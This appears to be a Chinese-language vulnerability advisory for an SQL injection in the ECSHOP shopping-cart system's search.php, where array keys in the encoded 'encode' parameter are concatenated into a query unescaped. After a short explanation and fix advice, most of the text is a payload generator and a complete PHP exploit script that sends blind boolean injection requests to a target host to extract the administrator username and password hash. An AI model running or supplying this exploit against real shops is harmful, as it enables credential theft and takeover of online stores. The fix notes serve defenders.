

ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞

影响版本:
ECSHOP All Version
漏洞描述:
文件 search.php
$string = base64_decode(trim($_GET['encode'])); //37行

$_REQUEST = array_merge($_REQUEST, addslashes_deep($string)); //69行

可以看出 addslashes_deep 只对参数的值进行转义，并不处理数组的键名。
//297行
if (!empty($_REQUEST['attr']))
{
$sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 ";
foreach ($_REQUEST['attr'] AS $key => $val)
{
if (is_not_null($val))
{
$attr_num++;
$sql .= " OR (1 ";

if (is_array($val))
{
$sql .= " AND attr_id = '$key'";

$key 是 $_REQUEST['attr'] 数组的键名，在这里没有经过任何过滤就被直接拼接进 SQL 语句，从而造成 SQL 注入漏洞；攻击者可自行构造 encode 参数的值进行注入。修复时应在拼接前对 $key 做强制整数转换或白名单校验，并优先改用参数化查询，而不是依赖 addslashes_deep 这类只针对值的转义。
<?php
$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' /*"=>"yy");
$string = array("attr"=>$list);
$string = str_replace('+', '%2b', base64_encode(serialize($string)));
die($string);
?>

测试方法:
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
global $argv;
exit(
"n--+++============================================================+++--".
"n--+++====== ECShop Search.php SQL Injection Exploit========+++--".
"n--+++============================================================+++--".
"nn[+] Author: jannock".
"n[+] Team: http://wavdb.com/".
"n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".
"n[+] Ex.: php ".$argv[0]." localhost / 1".
"nn");
}

function query($pos, $chr, $chs,$goodid)
{
switch ($chs){
case 0:
$query = "1=1";
break;
case 1:
$query = " ascii(substring((select user_name from ecs_admin_user limit 0,1),{$pos},1))={$chr}";
break;
case 2:
$query = " ascii(substring((select password from ecs_admin_user limit 0,1),{$pos},1))={$chr}";
break;
case 3:
$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";
break;
}
$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' union select $goodid,1 from ecs_admin_user where 1=1 and ". $query ."/*"=>"1");
$query = array("attr"=>$list);
$query = str_replace('+', '%2b', base64_encode(serialize($query)));
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);

$message = "GET ".$path."/search.php?encode=".query($pos, $chr, $chs,$goodid)." HTTP/1.1rn";
$message .= "Host: $hostnamern";
$message .= "Connection: Closernrn";

fwrite($conn, $message);
while (!feof($conn))
{
$reply .= fgets($conn, 1024);
}
fclose($conn);
return $reply;
}


function crkusername($hostname, $path, $chs,$goodid)
{
global $length;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "n";
}

function crkpassword($hostname, $path, $chs,$goodid)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 32)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "nn";
}

function lengthcolumns($hostname, $path,$chs, $goodid)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
$exit = 1;
$length = $pos;
break;
}
else
{
$pos++;
if($pos>20)
{
exit("Exploit failed");
}
}
}
echo $length."n";
return $length;
}


if ($argc != 4)
usage();
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1,$goodid);
crkpassword($hostname, $path, 2,$goodid);

?>